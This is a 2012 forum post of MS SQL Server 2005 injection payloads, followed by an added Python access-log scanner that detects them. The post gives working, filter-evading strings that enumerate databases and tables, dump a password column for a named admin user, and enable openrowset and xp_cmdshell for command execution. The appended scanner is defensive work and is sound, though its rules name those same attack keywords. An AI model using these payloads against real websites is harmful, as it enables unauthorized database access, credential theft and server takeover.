China Network Penetration Testing Alliance
Title: MSsql2005 injection statements
Author: admin
Time: 2012-9-13 17:19
CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
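Table enumeration statement: the somedb part is the database whose tables are to be listed; increment the number 1 marked in red.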
CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
Column dump statement: dumps the password field from table admin where user='icerover'.
CODE:
/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
In mssql2005, xp_cmdshell is not enabled by default, and openrowset cannot be used either.
With sa privileges, they can be enabled as follows.
Enable openrowset
CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
Enable xp_cmdshell
CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
ok, over~~ good night
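
For defenders, the statements above leave recognizable traces in web access logs once URL encoding and the /**/ separators are undone. The following is an added example, not part of the original post: a small log scanner whose rule names, log layout, hosts and paths are all assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Keywords come from the statements quoted in the post; rule names are made up here.
RULES = {
    "catalog-enumeration": re.compile(r"\bsysdatabases\b|\bsys\.all_objects\b", re.I),
    "config-change": re.compile(r"\bsp_configure\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "adhoc-queries": re.compile(r"\bad hoc distributed queries\b", re.I),
}
COMMENT = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'"(?:GET|POST) \S*?\?(\S*) HTTP')  # assumed log layout

def normalize(query):
    """URL-decode (up to 3 rounds, for double encoding), then flatten SQL comments."""
    decoded = query
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    flat = re.sub(r"\s+", " ", COMMENT.sub(" ", decoded))
    return decoded, flat

def classify(query):
    """Return the sorted names of all rules that fire on one query string."""
    decoded, flat = normalize(query)
    hits = {name for name, rx in RULES.items() if rx.search(flat)}
    # Three or more /**/ separators in one request is unusual for legitimate traffic.
    if len(COMMENT.findall(decoded)) >= 3:
        hits.add("comment-padding")
    return sorted(hits)

def scan(lines):
    """Return (line_number, rule_names) for every log line with at least one hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hits = classify(m.group(1)) if m else []
        if hits:
            findings.append((n, hits))
    return findings

# Constructed sample access-log lines (hosts, paths and parameters are invented).
SAMPLE_LOG = [
    '203.0.113.7 "GET /news.asp?id=12 HTTP/1.1" 200',
    '203.0.113.7 "GET /news.asp?id=12/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/somedb.sys.all_objects)%3d0-- HTTP/1.1" 500',
    '203.0.113.7 "GET /news.asp?id=12;EXEC/**/sp_configure/**/%27Ad/**/Hoc/**/Distributed/**/Queries%27,1;RECONFIGURE;-- HTTP/1.1" 200',
    '203.0.113.7 "GET /news.asp?id=12;EXEC%20sp_configure%20%27xp_cmdshell%27,1;RECONFIGURE;-- HTTP/1.1" 200',
    '198.51.100.4 "GET /search.asp?q=ad+hoc+reports HTTP/1.1" 200',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, ", ".join(hits))
```

Matching on the flattened text is what lets the 'Ad/**/Hoc/**/Distributed/**/Queries' form be caught by a plain keyword rule.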